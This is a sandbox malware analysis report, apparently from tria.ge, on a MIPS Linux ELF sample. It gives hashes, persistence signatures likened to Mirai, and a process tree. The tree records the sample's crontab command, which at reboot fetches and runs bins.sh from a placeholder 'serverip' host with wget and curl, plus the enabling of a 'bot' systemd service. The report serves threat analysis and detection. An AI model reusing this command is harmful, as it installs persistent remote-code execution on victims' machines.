Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

ec8201f332...31.elf

debian-9-mipsel

7

Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20231215-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    19/02/2024, 06:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf

  • Size

    98KB

  • MD5

    e5409ee931e29ffc035bf8802a141084

  • SHA1

    ce5d9cbe2ce5c217d55472240afb05a21d6ea69e

  • SHA256

    ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731

  • SHA512

    6793c7247613d08903105dcb41e33e9785f0c78c186217383b87814d6465b94add98113442b4b56c8f0f00d10d514420b9f9a3e2424d7d2eb77a87f44bdc79f4

  • SSDEEP

    1536:nR8r9obMb1xSK0AqVNvBOUUiMx7CBSkHC3eANKlDZQYr8N4eAe7ZiA:nRG9obMb1xb0AqVi3eLDhje7V

Score
7/10
persistence

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    persistence
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

    persistence
  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies systemd 1 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

    persistence
  • Modifies Bash startup script 1 TTPs 1 IoCs
    persistence
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
    /tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
    1⤵
    • Changes its process name
    • Modifies Watchdog functionality
    • Reads runtime system information
    PID:697
  • /bin/sh
    sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
    1⤵
      PID:709
      • /usr/bin/crontab
        crontab -
        2⤵
        • Creates/modifies Cron job
        PID:712
      • /bin/sh
        sh bins.sh
        2⤵
          PID:711
      • /usr/bin/crontab
        crontab -l
        1⤵
          PID:713
        • /bin/chmod
          chmod +x bins.sh
          1⤵
            PID:717
          • /bin/sh
            sh bins.sh
            1⤵
              PID:718
            • /bin/curl
              /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
              1⤵
                PID:720
              • /bin/chmod
                chmod +x bins.sh
                1⤵
                  PID:721
                • /bin/sh
                  sh -c "/bin/systemctl enable bot"
                  1⤵
                    PID:722
                    • /bin/systemctl
                      /bin/systemctl enable bot
                      2⤵
                      • Enumerates kernel/hardware configuration
                      • Reads runtime system information
                      PID:723

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /lib/systemd/system/bot.service
                    Filesize

                    356B

                    MD5

                    f03c70cd4c61a1852f9e19b8fb0d639c

                    SHA1

                    a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008

                    SHA256

                    ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90

                    SHA512

                    6277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20

                    Download Submit

                  • /var/spool/cron/crontabs/tmp.6oSfa1
                    Filesize

                    235B

                    MD5

                    a2c0cc09cb164e5d3737cbb278f9de89

                    SHA1

                    6b603cb91d1504052b9fca0c4d35d4a7e454aef3

                    SHA256

                    89b7403cf88dce252c8c767c1738f14893c16aa1683665fb06c4cfcfbfbc0d6c

                    SHA512

                    d460e905a1a1fd2981ef17bae23af307cda3000d2e7507ec654c7960bb88d70b455f7c183bac7c38dfc6d7621a8f758041fd37b17b9ec028e7f6a5b0cd759644

                    Download Submit